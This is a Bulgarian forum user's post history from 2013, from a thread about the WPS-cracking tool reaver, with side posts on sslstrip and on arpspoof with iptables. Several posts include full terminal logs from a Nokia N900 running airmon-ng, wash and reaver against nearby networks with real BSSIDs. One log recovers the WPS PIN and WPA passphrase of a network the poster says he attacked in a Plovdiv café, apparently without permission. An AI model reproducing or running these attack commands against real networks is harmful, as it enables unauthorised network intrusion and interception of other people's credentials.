Покажи Публикации - anrydisappear
* Виж публикациите на потр. | Виж темите на потр. | Виж прикачените файлове на потр
Страници: [1]
1  Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“ -: May 10, 2013, 11:19
Здравей Remotex,благодаря за програмката и най-важното за написаното на смилаем Бг.език пояснение за ядрата и нишките.
Цитат
публикувано от Gat3way
Също така и нямам намерение да се изхранвам с писане на мобилни приложения, имам си друга, съвсем различна работа и това е по-скоро отскорошно хоби.
Gat3way,най-малко аз искам да ти дам наклон в каква посока да върви живота ти човек,просто исках да кажа това само като инфо,нищо повече.
Цитат
публикувано от Gat3way
Нокия няма да си взема, па макар и с нормален линукс отгоре.
Живеем в демократичен свят,и аз уважавам избора ти

Благодаря и двама ви за подорбните обяснения,макар че ако трябва да бъда искрен със себе си,повечето от процесите които вие описвате на нормален потребител,му звучат като попаднъл на изпит по висша мтематика,а пък той знае само таблицата за умножение(говоря за себе си).Това ми напомня колко човек трябва да се рови и чете,за да проумее едва няколко % от това което вие обсъждате,но какво да се прави майката му е труд,а не чупки в кръста и гюбеци
2  Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“ -: May 09, 2013, 20:02
Здравей Gat3way,sorry че не съм писъл отдавна но нали знаеш като си купиш на старо някоя машина проблемите изкачат един след друг,нещо подобно както Дянков и валутният резерв.
Относно твоето приложение,наистина доста е различно от другите,защото в маркета поне аз подобно не видях(на моята н900,имам 2 OS droid 2.3.4)въпроса е доколко хората се интересуват от инфо относно безжичните връзки които ги заобикалят.

Иначе за ако можеш да изолираш "тъй-наречените пречещите AP"ще бъде наистина голям успех.
Но мисля че тука буквално трябва  да си прекомпилираш собствено ядро,за тези екстри.

Чудя се защо не си вземеш една нокиа н900,безтуй забелязвам че стихията ти е security testing,а този тел.(по точно таблет)има какво да ти предложи, а и има серизона подкрепа от linux ентусиасти,които да ти кажа много добре сърфират през безбрежният океан от linux world,но в крайна сметка ти имаш крайната дума.

Не знам доколко човек може да печели от development applications,защото аз не разпологам с такъв умствен капацитет,но имам 1 приятел който се занимава с правене на сайтове по поръчка(мисля че работи на php)той ми сподели че наистина не се лишава от нищо,а неговата душа граби с пълни шепи от живота.

Относно рекламата,ако наистина приложението ти добие някаква популярност(дано да се получи)те сами ще те потърсят.

В последно време,споря с 1 луд фен на тема хардуер(тука съм като индианец в макдоналдс)и софтуер,за това колко са физични и виртуални ядра в процесорите.Преди време бях срещнал едо мнение относно точно тези метафорични явления.

Та този експерт споделя че всъщност 4 ядрен процесор(говоря за мобилни такива)не са 4 ядра,а само 2,но в самият чип има повече нишки(тука вече забравих точното определение)и когато софта праща заявки за повече ресурси,тези нишки разделят ядрата на 2-реални+още 2 виртуални,специално ставаше дума за samsung galaxy s3 и samsung galaxy s4 и въобще за чипове в мобилни телефони

Знам че андроид ядрото е основано на linux kernel,(не е зле Torvalds да си поиска,обезщтетение от всички компании които го използват+iphone,тъй-като те ползват част от кода му)и тука идва забвната част.

Следователно ако софта прекалено натовари харда и тези прословути нишки започнат да функционират,това не става ли като предварително е зададено от кернела,защото кернела е софт,но без него харда е само става само за витрината.И тука стана един спор,все едно сме на предизборна кампания с този фен(мани,мани буквално ако бяхме в лице в лице направо щяхме да се смесим).

Ти човек,а и останалите в този форум сте доста навътре относно linux kernels,въобще логически като се замислиш вярно ли това(става дума за физичните и виртуалните ядра и дали в кернела е зададено по подразбиране за тези нишки)или този фен се е оказa прав че няма нищо вярно в тази теория.
Ще се радвам много,да чуя ваште мнения
3  Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“ -: Apr 26, 2013, 15:48
Цитат
оргинално публикувано от ApucTokpaT
TP-link са най-уязвими от към wps атаки -не създават никакви проблеми.В последно време обаче се напълни с мрежи на m-tel ,с които имам 0 % успеваемост интересува ме някой дали може да даде качествен линк с хардуера ,който използват ,благодаря предварително!

Здравей човек и мерси за инфото,моят рутер е TP-link но е доста стар,и не поддържа wireless security setup(wps),а относно m-tel мрежа досега не съм срещал да пробвам да разбия.

Gat3way,наскоро се закрастих отново да експериментирам относно сигурноста на протоколите(http,https,hsts)макар основният е http.След няколко опита с mozilla version 20.0.1(под proxy),успях без проблеми да си презапиша mail accounts от е-bay,paypal,hotmail,yahoo,bet365 като стартирам атаката чрез телефона и атакувам лаптопа си(докопах 1 msi) на порт 443(https)но gmail и twitter упорито отказват,директно ме прехвърлят на https,впрочем за twitter се показва надписа "warning try to redirect to http://www.twitter.com"но след като дам съгласието си,така и  не може да се справи да прехвърли на http,макар че основната роля на sslstrip e точно това,да задържи протокола какъвто и е подаден чрез команда(дано да не бъркам).Странното е че след като изтрия mozilla и после пак я инсталирам 1 опит е успешен,независимо от кой сайт искам да взема някакви данни.После като порових открих тези 2 мнения за gmail и twitter
Цитат
"Both use HSTS headers now, so if you're using a browser that supports them (like Chrome,or firefox),there's no opportunity for sslstrip to do anything. That output is from Twisted,and it doesn't indicate any actual problem."
и 2-то:
Цитат
"HSTS fixes this problem by informing the browser that connections to the site should always use SSL. Of course, the HSTS header can be stripped by the attacker if this is the user's first visit.Chrome attempts to limit this problem by including a hard-coded list of HSTS sites.Unfortunately this solution cannot scale to include all websites on the internet; a more workable solution can be achieved by including HSTS data inside DNS records, and accessing them securely via DNSSEC."
Накрая намерих това  https://www.owasp.org/index.php/HTTP_Strict_Transport_Security

Ти имаш някакви наблюдения основно за mozilla говоря,а и да те попитам нещо друго,не знам дали това не е в сферата на фантастиките но,ако имаше някакъв софт който само чрез да cap file извлечен чрез handshake да може да вириуализира паролата щеше да бъде невероятно,един вид да се обезмисли използването на речник

note:ако искаш прехвърли темата някъде другаде тъй-като тука говорим за протоколи а пак все заглавието на темата е  за reaver
4  Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“ -: Apr 22, 2013, 09:33
Здравей Gat3way,колкото можах прочетох с моят оскъден english твоят линк,наистина похвално е че този човек,е направил това с този куц кон(dorid),но както казва самият той софта му е много ранна фаза,и споменава че на кадъра които е постнал не се забелязва monitor mode,мисля че ако се намери достатъчно поддръжници(donors)това което би искал да види като завършена весия на неговият софт ще бъде направено.Относно това което казваш за reaver e доста новаторско,досега никой не е споменавал за този вариант,не знам дали ще се полчи под python,защото python разполога с ресурс да изчислява  доста бързо,иначе е страшно ефектно с 1 тел.както си запяш небрежно и му вземаш паролата(wep),говоря от личен опит.Не е зле да качиш твойта програма в google play,да видиш отзивите,за батерията и хакването в повечето случай специално за reaver,батерията не може да дочака заветният момент на появяването на дългоочакваната парола.
Цитат
оргинално публикувано от ApucTokpaT
Ммм ,тънък момент...
Това пък за какво...
Цитат
оргинално публикувано от  Gat3way
Рутери като например Netgear-ските, които слагат rate limit на WPS опитите също трябва да се вземат под внимание
.
Да си чувал тази екстра дали я има под tp-link

 
5  Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“ -: Apr 21, 2013, 16:30
Цитат
оргинално публикувано от Gat3way
 Обаче мисля, че ти имаш предвид това което ти вади "wash". Да, там няма да се види - защото то ти изкарва само АП-тата, които подръжат WPS, останалите се игнорират (reaver така или иначе не може да работи срещу тях).
Да,това имах предвид
Цитат
оргинално публикувано от Gat3way
Reaver няма как да направи разлика между това дали рутера те е отрязал заради прекалено много опити за единица време (rate limiting) или защото му е забранен WPS по време на атаката - за него и двете изглеждат по един и същ начин
.
Прав си,но това ме навежда на мисълта че рутера може сам да се сезира когато го атaкуват което ми звучи абсурдно,не вярвам да има такъв рутер,или поне аз не съм срещал такъв
Цитат
оргинално публикувано от Gat3way
Вярно е, а и допълнително е вярно че дори да бяха по-читави драйверите в андроидското ядро, ако нямаш root права, трудно ще направиш каквото и да било. Има custom rom-ове, които решават подобни проблеми, но това не е толкова приятно. Все пак има начин - дори без да root-ваш телефона, стига да имаш USB OTG подръжка (всички нови телефони/таблети го подържат), OTG кабел и USB wifi адаптер, който е с realtek-ски чипсет - едни пичове са хванали и са пренаписали целия realtek-ски драйвер в userspace, използвайки достъпната USB функционалност на андроида - и там могат да вкарат външното wifi в monitor mode и да слухтят трафик и да го запазват в pcap формат. Още не съм го изтествал - засега имам OTG кабела, но не съм си взел USB wifi адаптера
.
Не знам,за 1 път го чувам това,дали обаче като стартираш външen USB wifi адаптер,чрез usb port,кернела ти ще може да работи в мониторинг режим,аз не съм много надълбоко в linux world,но така мисля
Цитат
оргинално публикувано от Gat3way
Ще съм много задължен ако направиш един експеримент и споделиш резултата: след като вземеш BSSID-тата с wash, забрани monitor mode-a (airmon-ng stop mon0) и пробвай пак с reaver. Така ще сме напълно сигурни че monitor mode не трябва за WPS атаката с reaver, което би било добра новина
Няма как да пробвам от pc(сестра ми се бори на живот и смърт за нейният лаптоп,моят сдаде багажа сега се оглеждам за друг),а и колегата го е направил вече,но от тел.мога:

по твоят вариант:
BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ cd MyDocs/wl1251-maemo/binary/compat-wireless/
~/MyDocs/wl1251-maemo/binary/compat-wireless $ sudo gainroot
Root shell enabled


BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.s
h
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit
~/MyDocs/wl1251-maemo/binary/compat-wireless $ root


BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# airmon-ng start wlan0
BusyBox v1.21.0 (Debian 1.21.0power2) multi-call binary.

Usage: ps

Show list of processes

w Wide output
l Long output
T Show threads



Interface Chipset Driver

wlan0 TI WL1251 wl12xx - [phy0]
(monitor mode enabled on mon0)

Nokia-N900:~# wash -i mon0 -C -s

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
64:70:02:B6:51:08 6 -83 1.0 No Cvetarski magazin GULCHE
28:10:7B:ED:68:DC 11 -71 1.0 No su
F8:D1:11:41:2F:3C 6 -88 1.0 No setfani
^C
Nokia-N900:~# airmon-ng stop mon0


Interface Chipset Driver

wlan0 TI WL1251 wl12xx - [phy0]
mon0 TI WL1251 wl12xx - [phy0] (removed)

Nokia-N900:~# reaver -i wlan0 -b 64:70:02:B6:51:08 -d 0

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[-] Failed to initialize interface 'wlan0'
[-] Failed to recover WPA key

в monitor mode wlan0:
Nokia-N900:~# exit
~/MyDocs/wl1251-maemo/binary/compat-wireless $ sudo gainroot
Root shell enabled


BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh unload
.sh
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit
~/MyDocs/wl1251-maemo/binary/compat-wireless $ root


BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# ifconfig wlan0 down
Nokia-N900:~# iwconfig wlan0 mode Monitor
Nokia-N900:~# ifconfig wlan0 up
Nokia-N900:~# wash -i wlan0 -C -s

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
64:70:02:B6:51:08 6 -83 1.0 No Cvetarski magazin GULCHE
F8:D1:11:41:2F:3C 6 -88 1.0 No setfani
74:EA:3A:C5:A4:F4 9 -85 1.0 No TP-LINK_Blizoo
28:10:7B:ED:68:DC 11 -72 1.0 No su
00:11:6B:47:66:C6 11 -91 1.0 No WBR-6002
^C
Nokia-N900:~# reaver -i wlan0 -b 64:70:02:B6:51:08 -d 0

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session for 64:70:02:B6:51:08? [n/Y] n
  • Waiting for beacon from 64:70:02:B6:51:08
  • [!] WARNING: Failed to associate with 64:70:02:B6:51:08 (ESSID: Cvetarski magazin GULCHE)
    ^C
    това е нормално защото спрях wireless drivers

    без никакъв мониторинг режим,просто с super user:
    Nokia-N900:~# exit
    ~/MyDocs/wl1251-maemo/binary/compat-wireless $ sudo gainroot
    Root shell enabled


    BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.s
    h
    /home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit
    ~/MyDocs/wl1251-maemo/binary/compat-wireless $ root


    BusyBox v1.21.0 (Debian 1.21.0power2) built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    Nokia-N900:~# wash -i wlan0 -C -s

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <
cheffner@tacnetsol.com>

[X] ERROR: Failed to open 'wlan0' for capturing
Nokia-N900:~#
6  Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“ -: Apr 21, 2013, 12:59
Здравей Gat3way,не искам да навлизам в бурни дебати относно reaver,но ...
Цитат
оргинално публикувано от Gat3way
Тя налага да си в обхвата на рутера
логично
Цитат
оргинално публикувано от Gat3way
Процентите не мърдат от 0%, просто защото WPS е изключен
Грешка,ако е изключен WPS,няма как да го видиш в мониторинг режим,камо ли да предава пакети.Пак повтярям това е бъг на reaver,след стартиране на атаката,след приема на около 15%,просто изписва надписа rate "limiting detected" ако сте стартирали атаката с опцията -vv
Прилагам и обяснение от самият автор,ето линк  http://code.google.com/p/reaver-wps/wiki/FAQ  със особено внимание под надписа:
I get a warning "rate limiting detected", over and over again=lock wps
Относно reaver съм си правил доста експерменти,пробвал съм със всички опции но до ден дешен това с заключен wps,няма лек,Битуват разни мнения,че ако се стартират няколко вида атаки по 1 цел "рутер" рутера накрая се рестартира,оприличават го като атака със спам или sms bomb при който устройство се преторварва от исканите заявки,и се рестатира само с цел нормализиране на работата си.Преди време четох мисля че беше твое менение Gat3way,относно предаване и утройство на рутери,доколкото помня всичко беше основано на математика и на някакви случайни числа(дано да не бъркам,изпита по математика си го взимах като пълних бутилката с газ на преподавателката за моя сметка)тъй-като повечето софт(security testing) който е сътворен от девлоперите е основан на тази прословута математика,повтарям възможно да се рестартира рутера сам,но аз поне не съм го видял на живо.
Цитат
оргинално публикувано от Gat3way
защото няма как да вкараш wifi чипа в monitor mode и да слухтиш фреймове като хората
Мисля че затова са виновни хората създали ядрото(кернела) на дроида,между другото дроид е най-куцият тел.за изпълнение на такива хватки
Цитат
оргинално публикувано от Gat3way
Но пък идеята да имаш reaver на телефона си, при това без да се налага да го root-ваш, е забавна
Аз имам този софт близо година и половина на моят тел.(нокиа н900),давам ви пример какво представлява под н900:
~ $ sudo gainroot
Root shell enabled


BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user # cd MyDocs/wl1251-maemo/binary/compat-wireless/
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.sh
/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # exit~ $ root
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Nokia-N900:~# airmon-ng start wlan0


Interface Chipset Driver

wlan0 TI WL1251 wl12xx - [phy0]sleep: invalid number '1s'

(monitor mode enabled on mon0)

Nokia-N900:~# wash -i mon0 -C -s

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
70:71:BC:1B:A4:02 1 -82 1.0 N 5f6abc
00:11:6B:47:58:2A 1 -90 1.0 N Webster
^C
Nokia-N900:~# reaver -i mon0 -b 70:71:BC:1B:A4:02 -d 0
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Waiting for beacon from 70:71:BC:1B:A4:02
  • Associated with 70:71:BC:1B:A4:02 (ESSID: 5f6abc)
  • 0.01% complete @ 2012-02-29 11:38:56 {46 second(s)/pin}
  • 0.01% complete @ 2012-02-29 11:39:23 {73 second(s)/pin}
  • 0.01% complete @ 2012-02-29 11:39:53 {103 second(s)/pin}
  • 0.01% complete @ 2012-02-29 11:40:19 {129 second(s)/pin}
  • 90.91% complete @ 2012-02-29 11:41:03 {86 second(s)/pin}
  • 90.93% complete @ 2012-02-29 11:41:34 {51 second(s)/pin}
  • 90.93% complete @ 2012-02-29 11:42:02 {58 second(s)/pin}
  • 90.94% complete @ 2012-02-29 11:42:32 {52 second(s)/pin}
  • 90.95% complete @ 2012-02-29 11:42:57 {47 second(s)/pin}
  • 90.95% complete @ 2012-02-29 11:43:28 {45 second(s)/pin}
  • WPS PIN: '12345670'
  • WPA PSK: '227490756'
  • AP SSID: '5f6abc'
Nokia-N900:~#

Атаката е направих,в Пловдив в кафето до ПУ,не помня как се казваше но беше на 2 етажа
Цитат
оргинално публикувано от Gat3way
можеш да ползваш wlan интерфейса вместо mon интерфейса за експериментите с Reaver
Става но по принцип reaver е настроена да работи с интерфейс mon0,осезателна разлика няма

7  Хумор, сатира и забава / Живота, вселената и някакви други глупости / Re: За reaver из темата „Free distributed WPA PSK cracker“ -: Apr 21, 2013, 09:31
Цитат
публикувано от gat3way
Това ми напомня на онази книжка за тайните дневници на Елена Чаушеску. Дори точния абзац изрових от нета. Там става въпрос че другарката развива "научна" дейност в румънската академия на науките. Там се занимава с важни експерименти от сорта на
Не мога да проумея,на какво се дължи този сарказъм,или това е градивна критика подплътена солидно с доза английски хумор тип Джейн Остин "Гордост и Предразсъдъци" Gat3way ако има нещо да споделиш по темата ще се радвам да го чуя,но не по-този начин
8  Хумор, сатира и забава / Живота, вселената и някакви други глупости / За reaver из темата „Free distributed WPA PSK cracker“ -: Apr 18, 2013, 12:15
Цитат
публикувано от ApucTokpaT
Ама и той и нов да е ,като се заключи WPS ,ще го свали когато падне таванът на лятното кино...Рийвър не е панацея и той е зависим от определени фактори ,така както еъркрака.
Напълно си прав,това е някакъв бъг,който reaver има,независимо от версията.Пробвах като стартирам raver и като заключи WPS,веднага стартирам от друг терминал aireplay-ng за handshake,въпреки че успявам да получа handshake,% не мърдат от 0,единствено трика е да се рестартира рутера,но поне аз не знам досега да може рестартира рутер дистанционно.
9  Сигурност / Системна Сигурност / Re: Блокиране на facebook -: Feb 05, 2013, 16:20
Здрвейте фенове на линукс,един въпрос само.Имам 2 лаптопа в къщи,наскоро научих че чрез iptables,мога да пренасоча трафика,или да блокирам трафика към определн сайт.Опитвам се да си блокирам достъпа до фейса на единият лаптоп чрез другият,командите които намерих са:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -I PREROUTING -m tcp -p tcp -d http://www.facebook.com --dport 443 -j DROP
arpspoof -i wlan0 192.168.....
проблема е че отново имам достъп до фейса,някакви идеи
edit:имам инсталиран backtrack5 r3
Страници: [1]